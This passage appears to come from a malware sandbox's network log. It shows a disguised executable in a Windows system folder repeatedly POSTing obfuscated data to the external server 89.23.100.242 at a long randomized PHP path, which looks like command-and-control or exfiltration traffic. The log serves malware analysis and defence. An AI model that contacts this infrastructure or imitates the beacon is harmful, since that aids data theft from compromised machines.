User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2012
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:03.282778978 CET | 2012 | OUT | Data Raw: 59 56 43 53 5e 5d 56 52 58 5b 57 56 50 58 5b 51 55 5c 5e 5e 54 5d 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YVCS^]VRX[WVPX[QU\^^T]Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!$(>9[+#,"(><^<8#!47<$=?9&>70'_!/Y.%
Jan 10, 2025 07:58:03.786283016 CET | 374 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 3a 0d 37 05 2f 0a 26 2f 36 0a 2e 2c 22 0f 28 09 34 5a 3d 2d 0a 00 2a 33 2f 1e 2d 3c 3b 54 21 3b 00 00 3f 31 22 50 27 02 06 55 32 0d 21 59 0c 13 26 5b 3d 3a 0f 56 29 3a 2c 13 3c 0f 36 43 33 30 20 03 33 3d 31 54 34 3f 2c 5c 3f 5c 32 0b 28 1f 0c 0c 3a 07 01 04 28 2f 3c 1c 27 0c 2a 57 0c 1f 26 57 35 54 3e 0f 36 32 2d 00 25 3b 3f 1e 25 28 06 50 32 06 24 02 20 3a 02 00 2c 2a 3f 03 35 3e 3f 07 2a 3e 0c 10 23 31 20 18 2b 2c 20 51 22 0d 22 50 [TRUNCATED]
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98:7/&/6.,"(4Z=-*3/-<;T!;?1"P'U2!Y&[=:V):,<6C30 3=1T4?,\?\2(:(/<'*W&W5T>62-%;?%(P2$ :,*?5>?*>#1 +, Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49801 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:03.244288921 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:03.595292091 CET | 2544 | OUT | Data Raw: 59 55 43 56 5e 58 56 55 58 5b 57 56 50 5c 5b 55 55 50 5e 59 54 5d 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YUCV^XVUX[WVP\[UUP^YT]QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';(+">&8\,=R(=8^<8?!4*34=!$-_3'_!/Y.
Jan 10, 2025 07:58:04.003618956 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:04.195121050 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:58:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49808 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:04.323093891 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:58:04.673408985 CET | 2544 | OUT | Data Raw: 59 57 46 50 5e 56 56 55 58 5b 57 56 50 5c 5b 52 55 55 5e 58 54 5d 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YWFP^VVUX[WVP\[RUU^XT]QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,!#>=[>5#,*=U?8(+<6$(<3#_=?$>($'_!/Y.
Jan 10, 2025 07:58:05.183228970 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:05.324965000 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:58:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49814 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:05.510200977 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:05.860974073 CET | 2544 | OUT | Data Raw: 5c 52 43 50 5e 56 56 55 58 5b 57 56 50 5f 5b 56 55 54 5e 5d 54 59 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \RCP^VVUX[WVP_[VUT^]TYQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',+Y?1+%$/">-4_<(;"4'U? <*/"B%(\&:'_!/Y.9
Jan 10, 2025 07:58:06.311803102 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:06.463865995 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:58:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49823 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:06.600534916 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:06.954659939 CET | 2532 | OUT | Data Raw: 59 53 43 56 5e 5d 56 57 58 5b 57 56 50 5b 5b 53 55 52 5e 59 54 59 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YSCV^]VWX[WVP[[SUR^YTYQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B;"#Z<.+&',\%V?.8\(80";?3+Y*Y"C&=$*'_!/Y.1
Jan 10, 2025 07:58:07.344628096 CET | 225 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49830 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:07.474140882 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:07.829819918 CET | 2544 | OUT | Data Raw: 59 51 43 52 5e 5d 56 55 58 5b 57 56 50 5a 5b 52 55 57 5e 5f 54 5f 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YQCR^]VUX[WVPZ[RUW^_T_QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1/X>."(#8T>>8<$"'#( #=52(X0'_!/Y.-
Jan 10, 2025 07:58:08.327179909 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:08.460572958 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:58:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49837 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:08.585736990 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2536
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49840 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:08.805211067 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:09.157881975 CET | 2036 | OUT | Data Raw: 59 56 46 53 5e 56 53 54 58 5b 57 56 50 5c 5b 5a 55 52 5e 59 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YVFS^VSTX[WVP\[ZUR^YTPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B,#?-Z<%<Z,:W+?8!8<[+/&@&['3'_!/Y.
Jan 10, 2025 07:58:09.573379040 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:09.706527948 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 39 52 23 05 30 1c 26 3f 35 52 2d 06 3a 0e 28 30 3b 06 3d 3e 33 5f 29 23 3b 52 3a 01 24 0b 35 38 2d 5c 29 32 3e 56 27 2c 30 1c 26 1d 21 59 0c 13 26 5a 3c 29 2e 0e 29 04 24 5a 2b 31 0c 42 27 1d 2f 59 24 13 2d 50 34 2f 0d 03 2b 04 3a 0a 3c 08 3d 1f 2d 5f 30 15 3d 3c 34 54 27 0c 2a 57 0c 1f 26 56 23 31 3a 0d 20 22 08 12 27 06 34 0e 24 06 20 55 32 01 3b 5b 37 03 3b 12 2d 5f 37 00 21 00 28 5f 3e 58 3a 1f 36 22 27 0d 2b 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 989R#0&?5R-:(0;=>3_)#;R:$58-\)2>V',0&!Y&Z<).)$Z+1B'/Y$-P4/+:<=-_0=<4T'*W&V#1: "'4$ U2;[7;-_7!(_>X:6"'+ Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49841 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:08.928224087 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:09.283199072 CET | 2544 | OUT | Data Raw: 5c 56 46 57 5e 59 56 52 58 5b 57 56 50 53 5b 52 55 55 5e 58 54 58 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \VFW^YVRX[WVPS[RUU^XTXQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;18?-:>6$/:R+.<((4Z"$(#3Y)/%2<X0:'_!/Y.
Jan 10, 2025 07:58:09.664468050 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:09.818079948 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49849 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:09.941729069 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:10.298403025 CET | 2544 | OUT | Data Raw: 59 5f 43 5e 5e 57 56 54 58 5b 57 56 50 59 5b 51 55 54 5e 5f 54 5a 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y_C^^WVTX[WVPY[QUT^_TZQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';!?+-+/899>=8X?;<Y"B8(?_=*2> '*'_!/Y.!
Jan 10, 2025 07:58:10.681381941 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:10.808757067 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49856 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:10.962347984 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:11.314213991 CET | 2544 | OUT | Data Raw: 59 50 46 50 5e 5a 53 55 58 5b 57 56 50 5f 5b 51 55 5d 5e 52 54 5d 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YPFP^ZSUX[WVP_[QU]^RT]Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',2,(>>(/,*-S?[7?;!$?<3[=@1'':'_!/Y.9
Jan 10, 2025 07:58:11.725784063 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:11.860409021 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49864 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:12.015495062 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:12.360898018 CET | 2544 | OUT | Data Raw: 59 50 43 57 5e 5d 56 50 58 5b 57 56 50 5c 5b 50 55 52 5e 5d 54 5d 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YPCW^]VPX[WVP\[PUR^]T]QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;"8<=9[? [-)%(8)8$Z!;?3'X+<>A&'$*'_!/Y.
Jan 10, 2025 07:58:12.755327940 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:12.905602932 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49872 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:13.037450075 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
